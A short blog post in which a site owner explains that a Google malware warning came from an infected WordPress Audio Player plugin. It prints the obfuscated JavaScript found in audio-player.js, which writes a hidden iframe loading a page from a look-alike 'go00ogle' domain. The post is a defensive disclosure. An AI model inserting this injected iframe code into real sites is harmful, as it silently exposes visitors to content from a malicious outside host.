Posted In Internet

Longren.org Marked as Suspicious by Google

So, as many visitors have probably noticed, longren.org has been listed as a suspicious site by Google. Visiting this site in Firefox will result in Firefox warning you that you could be visiting a website that could harm your computer.
[ad]
Turns out this blog was infected with a go00ogle.net malware script. After following this helpful blog post, I was able to pinpoint the Audio Player plugin for WordPress as the culprit. The infected file was audio-player.js, and contained this snippet of code that should not have been there:

function advQuery(){
	var adv="http://google.com/";abs=unescape("%69%66%72%61%6D%65");Track="?sid=1";get=unescape("%6E%65%74");
	document.write("<"+abs+" src="+adv.substr(0,9)+unescape("u0030u0030")+adv.substr(9,5));
	document.write(get+"/go.php"+Track+" style=display:none><"+"/"+abs+">");
};advQuery();

I decided to just deactivate that plugin instead of deleting that piece of code from audio-player.js. This way there’s no chance audio-player.js will become infected again.

Well, now what?

Work with Me

I'm available for hire and always taking new clients, big and small. Got a project or an idea you'd like to discuss? Startup plan but no developer to make it happen? Just get in touch, I'd love to see if I can help you out!

Leave some Feedback

Got a question or some updated information releavant to this post? Please, leave a comment! The comments are a great way to get help, I read them all and reply to nearly every comment. Let's talk. :)

Longren.io is proudly hosted by DigitalOcean

DigitalOcean
  • oh yes it is really useful. thank you.